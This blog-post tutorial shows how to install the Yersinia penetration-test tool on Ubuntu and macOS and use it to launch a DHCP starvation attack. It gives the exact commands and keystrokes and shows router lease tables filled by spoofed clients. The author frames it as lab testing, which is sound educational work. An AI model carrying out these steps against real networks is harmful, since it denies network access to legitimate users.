Starving your DHCP server from IP addresses is something you want to avoid. But for several reasons, you may want to test this scenario in a lab environment. Yersinia is a penetration test tool that accomplishes this. It is a network tool designed to take advantage of some weakeness in different network protocols: STP, HSRP, CDP, DTP and more.
Today I discuss about how to use Yersinia to exhaust IP addresses from a DHCP server. Yersinia runs on Linux. Precompiled packages exist for Ubuntu, FreeBSD and Debian and it has been ported to MAC OS X. Following, you will find instructions on how to install Yersinia under Ubuntu Linux and MAC OS X.
Ubuntu Install
Installing Yersinia under Ubuntu is straightforward.
- Start a terminal session, from the main menu: Applications > Accessories > Terminal
- Type the following command: sudo apt-get install yersinia
Usage
From a terminal session, type: sudo yersinia -G
The -G flag invokes a GUI session:
Then, select the DHCP tab, click the Launch attack toolbar button and select <sending DISCOVER packet>. After you click OK, the attack will start and will exhaust your DHCP server pool. You should see the DHCP and Total counters increasing in the blue colored left hand side pane. To stop the attack, click the Exit toolbar button.
MAC OS X Install
Yersinia has been ported MAC OS X as a Darwin port. As a pre-requisite, your MacBook must have MacPorts installed. In a previous blog, I explained how to do this, see MacPorts Interesting Free Tools
Once you have MacPorts all set:
- Start a terminal window: from Finder, go to the Utilities Menu and select Terminal.app or simply select it from Spotlight (Command-Space)
- Type the following command to install Yersinia: sudo port install yersinia
Usage
Yersinia provides a native GTK graphical interface meant for Linux. It is not compatible with OS X. However, you have two more options: command line interface or nCurses. The nCurses option is the easiest one, giving you a semi-graphical navigational interface. Launch it as follows: sudo yersinia -I (capital i)
You will get a message informing you that en0 is the default interface used. Press any key to continue.
In my case, I use en1 most of the time (the Airport WiFi interface). To change for en1, type i
Next, type c) for en1. You might want to disable en0 if you don't use it. Then type q.
NOTE: To get help, you can type either h or ?
Now you want to select the DHCP flooding test by typing g and navigate with your up arrow to DHCP and press the Enter key.
Next, type x to launch the attack panel. Then type 1 (sending DISCOVER packet)
Counters will start increasing in Total Packets and DHCP Packets at the bottom of the display
To stop the attack, type l (lower case L), then press the Enter key.
Results
My DHCP server runs off a Cisco ASA5505 firewall. Its DHCP pool contains 51 addresses. Here is the IP address allocation before the attack:
MON-ASA# sh dhcpd binding
IP address Hardware address Lease expiration Type
192.168.1.125 0158.b035.6a61.be 3587 seconds Automatic
After the attack:
MON-ASA# sh dhcpd binding
IP address Hardware address Lease expiration Type
192.168.1.100 f355.826b.f86d 289 seconds Automatic
192.168.1.101 100e.be49.c867 289 seconds Automatic
192.168.1.102 9cf1.da52.ada0 290 seconds Automatic
192.168.1.103 c3ed.5303.cdcc 290 seconds Automatic
192.168.1.104 6bb2.fe56.4563 290 seconds Automatic
192.168.1.105 5797.4b21.fc0d 290 seconds Automatic
192.168.1.106 ed77.9e56.d0ba 290 seconds Automatic
192.168.1.107 e9a9.f82a.cef3 290 seconds Automatic
192.168.1.108 2e41.cd26.7132 290 seconds Automatic
192.168.1.109 8220.cc04.d5d3 290 seconds Automatic
192.168.1.110 9258.2f39.1c20 290 seconds Automatic
192.168.1.111 18a8.652a.5339 290 seconds Automatic
192.168.1.112 1a87.ac2b.fabe 291 seconds Automatic
192.168.1.113 6ebf.d37f.7b95 291 seconds Automatic
192.168.1.114 6cc6.ab06.c61e 291 seconds Automatic
192.168.1.115 d3ec.e128.8d8e 291 seconds Automatic
192.168.1.116 ba32.055a.836d 291 seconds Automatic
192.168.1.117 c03a.953b.3651 291 seconds Automatic
192.168.1.118 852f.ac5e.6c67 291 seconds Automatic
192.168.1.119 f2d2.114b.9b17 291 seconds Automatic
192.168.1.120 718a.4140.a7d6 291 seconds Automatic
192.168.1.121 2475.7330.3e19 291 seconds Automatic
192.168.1.122 b70b.c105.797a 292 seconds Automatic
192.168.1.123 21d3.eb39.7379 291 seconds Automatic
192.168.1.124 fc05.ee26.5b32 291 seconds Automatic
192.168.1.125 0158.b035.6a61.be 3340 seconds Automatic
192.168.1.126 017c.c537.f2b8.3f 3580 seconds Automatic
192.168.1.127 ed35.660c.fdb9 286 seconds Automatic
192.168.1.128 aa95.5115.aa96 286 seconds Automatic
192.168.1.129 e9f6.5215.afbe 286 seconds Automatic
192.168.1.130 9c34.244d.4dc9 286 seconds Automatic
192.168.1.131 4ae0.8332.4248 286 seconds Automatic
192.168.1.132 7893.6404.d3ed 286 seconds Automatic
192.168.1.133 9fa0.bd3d.0ad0 287 seconds Automatic
192.168.1.134 ae47.f259.9659 287 seconds Automatic
192.168.1.135 2b9d.5900.5833 287 seconds Automatic
192.168.1.136 9bc8.d845.94d7 287 seconds Automatic
192.168.1.137 6ec8.e45d.7dd6 287 seconds Automatic
192.168.1.138 9126.4e22.4f09 287 seconds Automatic
192.168.1.139 00bd.564b.bce8 287 seconds Automatic
192.168.1.140 2a74.047e.d4eb 287 seconds Automatic
192.168.1.141 c8e0.c923.456b 287 seconds Automatic
192.168.1.142 160a.1878.e546 287 seconds Automatic
192.168.1.143 d658.6d4c.29ad 288 seconds Automatic
192.168.1.144 063d.8920.7fb1 288 seconds Automatic
192.168.1.145 5043.8a28.4fdf 288 seconds Automatic
192.168.1.146 90e9.3d11.a87e 288 seconds Automatic
192.168.1.147 1e63.7344.aa92 288 seconds Automatic
192.168.1.148 53eb.2901.ee05 288 seconds Automatic
192.168.1.149 47e4.6d7e.1d8e 288 seconds Automatic
192.168.1.150 5855.2c0a.3a00 288 seconds Automatic
Conclusion
Yersinia is an excellent pentest suite to have in your lab toolkit. It can perform flooding of DHCP requests or act as a rogue DHCP server. In a matter of seconds, it filled up a 50 IP address DHCP pool. Make sure you use it in a lab.
For more information, please visit Yersiinia home page:
http://www.yersinia.net/index.htm
The types of attacks supported are listed here:
http://www.yersinia.net/attacks.htm
